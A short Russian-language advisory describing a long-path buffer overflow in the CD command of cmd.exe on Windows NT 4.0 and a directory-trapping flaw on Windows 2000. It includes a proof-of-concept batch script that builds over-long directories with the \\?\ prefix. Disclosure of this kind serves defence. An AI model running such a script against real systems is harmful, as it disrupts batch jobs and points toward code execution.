Переполнение буфера в cmd.exe

Файловая система NTFS позволяет создавать пути почти неограниченной длины. Но Windows API не позволяет создавать пути длинее 256 байтов. Чтобы обойти это ограничение, можно использовать в пути к файлу префикс ‘\\?\’ . Это документированная особенность Windows API.

В cmd.exe для Windows NT 4.0 обнаружено простейшее переполнение буфера в команде CD, если адресуемый путь длиннее 256 символов. Уязвимость может эксплуатироваться для выполнения произвольного кода.

В cmd.exe для Windows 2000 нет переполнения буфера. Но переход на каталог с путем немного больше, чем 256 символов (например, 260 символов) cmd.exe будет “заперт” в этом каталоге (это означает, что невозможно будет выполнить команду ‘CD ..’) . Уязвимость может использоваться, например, против выполнения пакетного файла.

Пример:

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\
c:
cd \
cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
cd BBBBBBBBBBBB*
cd ..

Уязвимость обнаружена в Microsoft Windows NT 4.0/2000